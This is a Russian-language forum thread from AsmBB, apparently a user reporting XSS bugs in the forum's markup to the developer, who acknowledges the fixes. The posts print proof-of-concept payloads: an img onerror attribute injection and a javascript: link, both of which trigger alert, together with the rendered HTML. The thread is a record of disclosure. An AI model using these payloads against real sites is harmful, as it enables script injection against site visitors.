..:: AsmBB ::..

xmdsv; Thread: XSS - Внедрение произвольного атрибута в <img>; 13.01.2017

;quote johnfound

Спасибо. Исправлено.
;end quote
Ого, как быстро [?:)]

#15313

xmdsv; Thread: XSS - Внедрение произвольного атрибута в <img>; 13.01.2017

;quote johnfound
;quote xmdsv
;quote johnfound
Теперь должно быть в порядке.
;end quote
Исправлено.

Нашел еще...

#15311

xmdsv; Thread: XSS - Внедрение произвольного атрибута в <img>; 13.01.2017

;quote johnfound
Теперь должно быть в порядке.
;end quote
Исправлено.

Нашел еще одну XSS в форме...

#15297

xmdsv; Thread: XSS - Внедрение произвольного атрибута в <img>; 13.01.2017

Вот XSS:
;begin
[![onerror=alert(String.fromCharCode(72,105,33,32,58,41))//]] 
;end
Результат:
;begin
<img class="txt" src="[x onerror=alert(String.fromCharCode(72,105,33,32,58,41))//]" alt="!<a href="x onerror=alert(String.fromCharCode(72,105,33,32,58,41))//">x onerror=alert(String.fromCharCode(72,105,33,32,58,41))//</a>" />...

#15294

xmdsv; Thread: XSS via link (%01javascript:XSS); 11.01.2017

#XSS
click - [javascript:alert("Hi!")]